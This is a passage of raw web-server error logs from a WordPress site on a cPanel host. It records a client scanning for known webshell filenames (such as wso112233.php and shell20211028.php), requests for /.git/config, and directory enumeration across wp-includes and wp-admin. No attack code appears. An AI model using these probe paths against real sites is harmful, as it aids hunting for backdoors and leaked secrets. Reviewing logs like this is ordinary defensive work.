2024] [ssl:warn] [pid 28475:tid 140103408002944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 05 03:17:32.352244 2024] [ssl:warn] [pid 28477:tid 140103408002944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 05 03:17:32.770611 2024] [ssl:warn] [pid 28477:tid 140103408002944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 05 03:17:34.596751 2024] [ssl:warn] [pid 28477:tid 140103408002944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 05 03:17:36.922768 2024] [ssl:warn] [pid 28922:tid 140354335356800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 05 03:17:45.148245 2024] [ssl:warn] [pid 28926:tid 140354335356800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 05 03:17:45.829919 2024] [ssl:warn] [pid 28926:tid 140354335356800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/05 09:54:04 [error] 29043#29043: *115644 access forbidden by rule, client: 3.239.127.242, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/05 12:26:53 [error] 29042#29042: *117410 access forbidden by rule, client: 3.239.127.242, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Fri Jan 05 13:04:47.631206 2024] [:error] [pid 29080:tid 140354003126016] [client 178.128.208.198:50464] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Jan 05 13:06:55.632898 2024] [:error] [pid 29695:tid 140354127435520] [client 178.128.208.198:50680] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/x.php [Fri Jan 05 13:07:11.594672 2024] [:error] [pid 29082:tid 140353919198976] [client 178.128.208.198:50718] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/404.php [Fri Jan 05 13:07:20.867992 2024] [:error] [pid 29695:tid 140354019911424] [client 178.128.208.198:50738] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bala.php [Fri Jan 05 13:07:26.042423 2024] [:error] [pid 29695:tid 140353977947904] [client 178.128.208.198:50754] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Jan 05 13:07:26.325107 2024] [:error] [pid 29695:tid 140353952769792] [client 178.128.208.198:50756] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Jan 05 13:07:39.127405 2024] [:error] [pid 29082:tid 140353935984384] [client 178.128.208.198:50772] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Fri Jan 05 13:07:39.370801 2024] [:error] [pid 29080:tid 140353927591680] [client 178.128.208.198:50774] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Fri Jan 05 13:07:44.940784 2024] [:error] [pid 29082:tid 140354019911424] [client 178.128.208.198:50790] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Fri Jan 05 13:07:45.188709 2024] [:error] [pid 29082:tid 140353977947904] [client 178.128.208.198:50792] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Jan 05 13:07:45.440646 2024] [:error] [pid 29080:tid 140353986340608] [client 178.128.208.198:50798] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Jan 05 13:07:48.641865 2024] [:error] [pid 29080:tid 140354011518720] [client 178.128.208.198:50814] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Fri Jan 05 13:07:48.894627 2024] [:error] [pid 29082:tid 140353885628160] [client 178.128.208.198:50816] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Fri Jan 05 13:08:00.195444 2024] [:error] [pid 29082:tid 140353944377088] [client 178.128.208.198:50840] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell20211028.php [Fri Jan 05 13:08:01.517645 2024] [:error] [pid 29080:tid 140353885628160] [client 178.128.208.198:50844] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ssl.php [Fri Jan 05 13:11:04.595912 2024] [autoindex:error] [pid 29081:tid 140353994733312] [client 178.128.208.198:51140] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/01/05 13:11:04 [error] 29043#29043: *118343 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 178.128.208.198, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/01/05 13:11:05 [error] 29043#29043: *118343 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 178.128.208.198, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Fri Jan 05 13:11:07.373388 2024] [autoindex:error] [pid 29695:tid 140353894020864] [client 178.128.208.198:51146] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:09.508802 2024] [autoindex:error] [pid 29695:tid 140354152613632] [client 178.128.208.198:51154] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:10.776532 2024] [autoindex:error] [pid 29082:tid 140353952769792] [client 178.128.208.198:51158] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:11.029001 2024] [autoindex:error] [pid 29082:tid 140354119042816] [client 178.128.208.198:51160] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:11.262676 2024] [autoindex:error] [pid 29082:tid 140354011518720] [client 178.128.208.198:51162] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:11.521689 2024] [autoindex:error] [pid 29082:tid 140353877235456] [client 178.128.208.198:51164] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:12.003585 2024] [autoindex:error] [pid 29082:tid 140353977947904] [client 178.128.208.198:51168] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:12.255312 2024] [autoindex:error] [pid 29082:tid 140354003126016] [client 178.128.208.198:51170] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:12.500098 2024] [autoindex:error] [pid 29082:tid 140353885628160] [client 178.128.208.198:51172] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:12.764225 2024] [autoindex:error] [pid 29081:tid 140353944377088] [client 178.128.208.198:51174] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:12.997786 2024] [autoindex:error] [pid 29080:tid 140353977947904] [client 178.128.208.198:51176] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:13.281465 2024] [:error] [pid 29080:tid 140353919198976] [client 178.128.208.198:51178] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Jan 05 13:11:13.281784 2024] [:error] [pid 29080:tid 140353919198976] [client 178.128.208.198:51178] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Jan 05 13:11:13.281948 2024] [:error] [pid 29080:tid 140353919198976] [client 178.128.208.198:51178] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Jan 05 13:11:13.282124 2024] [:error] [pid 29080:tid 140353919198976] [client 178.128.208.198:51178] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Jan 05 13:11:13.523074 2024] [autoindex:error] [pid 29080:tid 140354135828224] [client 178.128.208.198:51180] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:13.757269 2024] [autoindex:error] [pid 29695:tid 140353961162496] [client 178.128.208.198:51182] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:13.991759 2024] [autoindex:error] [pid 29082:tid 140354110650112] [client 178.128.208.198:51184] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:14.224866 2024] [autoindex:error] [pid 29082:tid 140353927591680] [client 178.128.208.198:51186] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:14.464984 2024] [autoindex:error] [pid 29081:tid 140353902413568] [client 178.128.208.198:51188] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:14.711849 2024] [autoindex:error] [pid 29081:tid 140354110650112] [client 178.128.208.198:51190] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:14.950558 2024] [autoindex:error] [pid 29081:tid 140354003126016] [client 178.128.208.198:51192] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:15.183700 2024] [autoindex:error] [pid 29081:tid 140353885628160] [client 178.128.208.198:51194] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:15.419019 2024] [autoindex:error] [pid 29081:tid 140353910806272] [client 178.128.208.198:51196] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:15.651618 2024] [autoindex:error] [pid 29081:tid 140354019911424] [client 178.128.208.198:51198] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:19.978238 2024] [autoindex:error] [pid 29081:tid 140353986340608] [client 178.128.208.198:51210] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:42.439215 2024] [autoindex:error] [pid 29695:tid 140354135828224] [client 178.128.208.198:51266] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:11:44.748460 2024] [autoindex:error] [pid 29082:tid 140353894020864] [client 178.128.208.198:51272] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:06.092297 2024] [autoindex:error] [pid 29695:tid 140353927591680] [client 178.128.208.198:51300] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:06.326204 2024] [autoindex:error] [pid 29081:tid 140353952769792] [client 178.128.208.198:51302] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:06.568341 2024] [autoindex:error] [pid 29082:tid 140353910806272] [client 178.128.208.198:51304] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:06.812182 2024] [autoindex:error] [pid 29082:tid 140353986340608] [client 178.128.208.198:51306] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:07.046799 2024] [autoindex:error] [pid 29695:tid 140354119042816] [client 178.128.208.198:51308] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:07.283465 2024] [autoindex:error] [pid 29081:tid 140354144220928] [client 178.128.208.198:51310] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:07.519197 2024] [autoindex:error] [pid 29080:tid 140353935984384] [client 178.128.208.198:51312] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:07.753331 2024] [autoindex:error] [pid 29695:tid 140354127435520] [client 178.128.208.198:51314] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:07.987037 2024] [autoindex:error] [pid 29695:tid 140354011518720] [client 178.128.208.198:51316] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:08.221804 2024] [autoindex:error] [pid 29081:tid 140354127435520] [client 178.128.208.198:51318] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:08.457488 2024] [autoindex:error] [pid 29695:tid 140353994733312] [client 178.128.208.198:51320] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:09.776062 2024] [autoindex:error] [pid 29695:tid 140353935984384] [client 178.128.208.198:51324] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:10.011990 2024] [autoindex:error] [pid 29080:tid 140353994733312] [client 178.128.208.198:51326] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:11.383074 2024] [autoindex:error] [pid 29082:tid 140354119042816] [client 178.128.208.198:51330] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:11.637927 2024] [autoindex:error] [pid 29082:tid 140354011518720] [client 178.128.208.198:51332] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:11.873393 2024] [autoindex:error] [pid 29082:tid 140353877235456] [client 178.128.208.198:51334] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:12.109136 2024] [autoindex:error] [pid 29082:tid 140354019911424] [client 178.128.208.198:51336] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:12.359946 2024] [autoindex:error] [pid 29081:tid 140353969555200] [client 178.128.208.198:51338] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:12.606969 2024] [autoindex:error] [pid 29080:tid 140354110650112] [client 178.128.208.198:51340] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:12.891876 2024] [autoindex:error] [pid 29080:tid 140353961162496] [client 178.128.208.198:51342] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:13.130347 2024] [autoindex:error] [pid 29080:tid 140353894020864] [client 178.128.208.198:51344] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 13:12:13.380644 2024] [autoindex:error] [pid 29080:tid 140353927591680] [client 178.128.208.198:51346] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 